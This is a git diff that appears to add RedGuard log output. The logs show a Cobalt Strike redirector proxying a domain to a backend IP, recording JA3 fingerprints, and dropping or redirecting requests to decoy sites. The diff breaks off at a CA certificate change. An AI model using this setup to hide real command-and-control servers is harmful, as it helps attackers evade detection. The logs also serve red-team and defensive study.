3590d1b8f63dd1d590f0adea4227443d +[2022-05-30 17:41:37] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:41:37] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:41:37] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-30 17:41:37] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:42:06] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:42:06] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:42:06] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:42:06] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:42:08] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-30 17:42:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:42:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:42:08] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-30 17:42:08] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:42:23] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:42:23] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:42:23] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:42:23] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:42:24] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-30 17:42:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:42:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:42:24] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-30 17:42:24] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-31 14:20:49] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-31 14:20:49] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-31 14:20:49] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-31 14:20:49] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:21:32] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-31 14:21:41] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-31 14:21:41] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-31 14:21:41] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-31 14:21:41] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-31 14:21:59] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:21:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:21:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:21:59] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:22:31] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-31 14:23:42] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-31 14:23:42] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-31 14:23:42] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-31 14:23:42] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-31 14:23:43] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:23:43] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:23:43] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:23:44] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-31 14:23:44] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-05-31 14:24:40] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-31 14:24:40] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-31 14:24:40] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-31 14:24:40] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-31 14:24:41] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:24:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:24:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:24:41] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-31 14:24:41] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-05-31 14:25:02] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:25:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:25:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:25:02] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-31 14:26:57] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-31 14:26:57] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-31 14:26:57] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-31 14:26:57] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-31 14:27:00] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:27:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:27:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:27:00] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-31 14:27:26] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-31 14:27:26] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-31 14:27:26] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-31 14:27:26] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-31 14:27:28] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d +[2022-05-31 14:27:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-31 14:27:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-31 14:27:28] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-06-01 15:36:04] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-06-01 15:36:04] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-06-01 15:36:04] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-06-01 15:36:04] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c +[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:11] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:36:11] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c +[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:12] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:36:12] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c +[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:14] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:36:14] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c +[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 +[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: dfa1a04d7a3940d1792725df93f81719 +[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 +[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 1b550bbdde0f6511638eb52cd2ef9787 +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://tencent.com/ +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: c0fc8d2a3090cfd5c5a4d6a027c0d9ee +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:25] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 +[2022-06-01 15:36:25] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: c21234fe03e9149213ede6ecf6333853 +[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 +[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 9d92b5b69ad7e3ba6732b092276f2a40 +[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 +[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:52] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: a1cf9cd9cf6ecfd42459643454d3d409 +[2022-06-01 15:36:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:53] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-06-01 15:36:53] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:54] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0294d48ead6646ccd3446c0d79b953d4 +[2022-06-01 15:36:54] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:54] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:54] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-06-01 15:36:54] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: b9ddaf9bf0f00f86749f6e8b83b759ec +[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: ab6c50ef473b76a2aaf48bd06d20f8e1 +[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:37:00] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 34bab37e854f9e9afb68e9a98bef9c81 +[2022-06-01 15:37:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:01] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-06-01 15:37:01] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 +[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:12] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 +[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://tencent.com/ +[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 +[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:28] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://yun.tencent.com +[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 +[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:30] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://yun.tencent.com +[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 +[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:40] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 +[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:41] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 +[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +[2022-06-01 15:37:41] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 +[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ [2 \ No newline at end of file diff --git a/cert-rsa/ca.crt b/cert-rsa/ca.crt index 1c45362..6396551 100644 --- a/cert-rsa/ca.crt +++ b/cert-rsa/ca.crt @@ -1,24 +1,24 @@ ------BEGIN CERTIFICATE----- -MIIEFDCCAvygAwIBAgIIFwGR46UNXCwwDQYJKoZIhvcNAQELBQAwZjELMAkGA1UE -BhMCQ04xETAPBgNVBAcTCEhhbmdaaG91MS0wKwYDVQQKEyRBbGliYWJhIChDaGlu 